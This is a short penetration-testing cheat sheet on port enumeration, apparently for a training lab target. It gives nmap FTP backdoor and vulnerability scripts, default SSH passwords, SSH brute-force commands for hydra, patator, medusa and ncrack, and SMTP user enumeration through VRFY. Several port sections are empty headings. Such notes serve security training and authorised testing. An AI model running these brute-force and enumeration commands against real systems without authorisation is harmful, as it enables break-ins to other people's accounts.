02 Port Enumeration

Port 21 - FTP

nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.11.1.5 

Port 22 - SSH

try to login with default/simple account : admin:admin, root:root, user:password

Brute Force

BruteForce:

patator ssh_login host=10.11.1.5 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'
hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.11.1.5
medusa -h 10.11.1.5 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh
ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.11.1.5

Port 25 - SMTP

nc -nvv 10.11.1.5 25
HELO foo<cr><lf>

telnet 10.11.1.5 25
VRFY root

https://tools.kali.org/information-gathering/smtp-user-enum

Port 53 - DNS

Port 88 - Kerberos

Port 110 - Pop3

Port 111 - Rpcbind

Port 135 - MSRPC

Port 139/445 - SMB

Port 389,636 LDAP

Port 1433 MSSQL

Last updated

Was this helpful?